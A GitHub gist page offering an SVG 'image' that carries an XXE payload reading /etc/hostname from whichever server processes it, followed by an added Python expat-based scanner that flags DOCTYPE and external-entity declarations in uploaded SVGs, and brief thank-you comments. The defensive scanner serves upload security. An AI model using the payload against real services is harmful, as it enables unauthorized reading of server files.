@jakekarnes42
Created August 13, 2019 23:44
An SVG "image" that uses an XXE attack to embed the hostname file of whichever system processes it into the image itself
<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]><svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1"><text font-size="16" x="0" y="16">&xxe;</text></svg>
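For services that accept SVG uploads, the following added example (not part of the gist) flags files like the one above before they reach a rendering or conversion step, using Python's standard-library expat binding. The names `scan_svg`, `XXE_SVG` and `CLEAN_SVG` are assumptions made for illustration, and `CLEAN_SVG` is a constructed sample.

```python
import xml.parsers.expat

# The gist's SVG, embedded so the check runs offline.
XXE_SVG = (
    b'<?xml version="1.0" standalone="yes"?>'
    b'<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>'
    b'<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" '
    b'xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">'
    b'<text font-size="16" x="0" y="16">&xxe;</text></svg>'
)
# Constructed benign sample for comparison.
CLEAN_SVG = (
    b'<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg">'
    b'<text font-size="16" x="0" y="16">hello</text></svg>'
)


def scan_svg(data: bytes) -> list[str]:
    """Return reasons to reject an uploaded SVG; an empty list means no DTD was seen."""
    findings: list[str] = []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings.append(f"DOCTYPE declared: {name}")

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        kind = "external" if system_id else "internal"
        findings.append(f"{kind} entity declared: {name} -> {system_id or value}")

    def on_external_ref(context, base, system_id, public_id):
        # Record the reference; this handler fetches nothing. Returning 1 lets parsing continue.
        findings.append(f"external entity referenced: {system_id}")
        return 1

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        findings.append(f"not well-formed XML: {exc}")
    return findings


if __name__ == "__main__":
    for label, sample in (("gist SVG", XXE_SVG), ("clean SVG", CLEAN_SVG)):
        print(label, "->", scan_svg(sample) or "accepted")
```

Rejecting every upload with a non-empty result is the simplest policy, since ordinary SVG files render without a DTD.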
@0xSn4k3000

Thx for this ...

@sha-16

sha-16 commented Mar 27, 2023

Thankssss! Good contribution!

@romankis95

very useful, thank you

@czasec

czasec commented Oct 28, 2023

awesome

]>&xxe;

<>
